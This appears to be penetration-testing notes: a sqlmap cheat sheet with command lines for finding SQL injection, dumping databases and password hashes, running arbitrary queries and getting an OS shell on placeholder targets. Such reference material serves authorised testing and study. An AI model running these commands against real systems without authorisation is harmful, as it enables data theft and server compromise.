Assess and exploit SQL injection vulnerability. Made in Python. Ref: http://www.binarytides.com/sqlmap-hacking-tutorial
❗ NOT ALLOWED DURING THE OSCP EXAM
Upgrade SQLmap
apt install --only-upgrade sqlmapHelp
sqlmap -h
sqlmap -hh--technique="BEUSTQ"
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries💡 For penetration test when customer data extraction is not allowed, use –banner.
Specify injection points
💡 You can use asterisks * to specify your injection point.
sqlmap -u "http://www.example.com/index.php?id=1" --data="POST_STRING_HERE*" --dbsFor urls that are not in the form of “param=value”, SQLmap cannot automatically know where to inject. In such cases SQLmap needs to be told the injection point marked by a “*”. For example:
URL="http://x.x.x.x/class_name/method/43*/80"In JSON from request file:
POST /someapi
...
{"name":"joe", email":"*"}Troubleshooting
sqlmap -v 6 ...sqlmap --proxy http://127.0.0.1:8080 ...HTTP POST/PUT
❗ For HTTPS, add option “–force-ssl”
- –data : POST request, parameters with values
- -p : parameters that SQLmap will try to inject. CAN BE A COOKIE NAME.
URL="http://x.x.x.x/login.php"
COOKIES="cookie1=value1; cookie2=value2"
sqlmap -u $URL --data="username=admin&password=foo&login=submit" -p username,password --dbms=mysql --cookie="$COOKIES" --level=5 --risk=3sqlmap --method=PUT ...HTTP GET
❗ For HTTPS, add option “–force-ssl”
- -p : parameters that SQLmap will try to inject. CAN BE A COOKIE NAME.
URL="http://x.x.x.x/?cat=1"
COOKIES="cookie1=value1; cookie2=value2"
# --passwords: Enumerate DBMS users password hashes
sqlmap -u $URL --dbms=MySQL --cookie="$COOKIES" -p cat --level=5 --risk=3 --passwordsURL="http://x.x.x.x/?param1=1¶m2=2"
sqlmap -u $URL --ignore-proxy --force-ssl -H "Header1: value1" -p param1,param2 --level=5 --risk=3 --banner# Test for SQL injection
URL="http://x.x.x.x/admin"
sqlmap -u $URL --crawl=1Inject in cookies
sqlmap -u $URL --dbms=MySQL --cookie="cookie1=*" -p cookie1 --users --passwordsDo not use results from previous sessions
sqlmap --flush-session ...Using a request file
Copy/Paste a request from Burp Suite into a file.
FILE=~/Documents/burp_request.txt
# List all databases
sqlmap -r $FILE --dbsOther examples
#-------------------------------------------------------------------------------
# VARIABLES
#-------------------------------------------------------------------------------
DIR="/root/Documents"
URL="http://x.x.x.x/admin"
DB="owasp10"
TABLE="users"
QUERY="SELECT * from ..."
#-------------------------------------------------------------------------------
# *** TO COMPLETE
#-------------------------------------------------------------------------------
URL=" http://x.x.x.x/owaspbricks/login-1/index.php"
sqlmap -u $URL --dbms=MySQL --level=5 --risk=3 --passwords
#-------------------------------------------------------------------------------
# Check the input parameters to find if they are vulnerable to sql injection or not
#-------------------------------------------------------------------------------
# Need to have at least one parameter in the URL?
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL
#-------------------------------------------------------------------------------
# List all databases
#-------------------------------------------------------------------------------
sqlmap -u $URL --dbs
sqlmap -r $FILE --dbs
#-------------------------------------------------------------------------------
# Find tables in a particular database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --tables -D $DB
sqlmap -r $FILE --tables -D $DB
#-------------------------------------------------------------------------------
# Get columns of a table
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --columns -D $DB -T $TABLE
#-------------------------------------------------------------------------------
# Get data from a table, display the content.
# sqlmap will create a csv file containing the dump data for easy analysis.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --dump -D $DB -T $TABLE
sqlmap -r $FILE --dump -D $DB -T $TABLE
#-------------------------------------------------------------------------------
# Dump the database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --dbms=mysql --dump --threads=7
sqlmap -r request.txt --data=muser,mpass --dbms=mysql --dump
request.txt: contains request copy/pasted from Burp
#-------------------------------------------------------------------------------
# Execute arbitrary sql queries
#-------------------------------------------------------------------------------
# Things of interest would be to create a user in the users table or something similar.
# Or maybe change/modify the content of CMS pages etc.
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-query $QUERY
#-------------------------------------------------------------------------------
# Execute arbitrary sql queries with a SQL shell. Gives an sql shell like interface to run queries interactively.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-shell
#-------------------------------------------------------------------------------
# Try to get a shell on remote system, but it has many limitations of its own.
#-------------------------------------------------------------------------------
# It is possible to run arbitrary commands on the database server's underlying operating
# system when the back-end database management system is either MySQL, PostgreSQL or
# Microsoft SQL Server, and the session user has the needed privileges to abuse database
# specific functionalities and architectural weaknesses.
--os-shell
#-------------------------------------------------------------------------------
# Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at the first task of "testing connection to the target url". Use the option to make sqlmap use a valid user agent signature like the ones send by a browser like chrome or firefox.
#-------------------------------------------------------------------------------
--random-agent
#-------------------------------------------------------------------------------
# When using forms that submit data through post method then sqlmap has to be provided the post data.
#-------------------------------------------------------------------------------
--dataWebsockets
❗ This does not return any errors but does not work. See this post.
sqlmap -u "ws://example.com:1234/?id=123" -p "id" --dbsSee Hack the Box (HTB) – Soccer.
Start an HTTP Proxy with sqlmap-websocket-proxy
HTTP Proxy for using sqlmap against websockets, see Official Documentation.
sudo pip3 install sqlmap-websocket-proxysqlmap-websocket-proxy
usage: sqlmap-websocket-proxy [-h] -u URL -p PAYLOAD [-o PORT] [--json]sqlmap-websocket-proxy -u example.com:1234 -p '{"id":"%param%"}' --jsonRun SQLmap as usual but proxied via localhost:8080.
sqlmap -u "http://localhost:8080/?id=1" -p id --dbms=mysql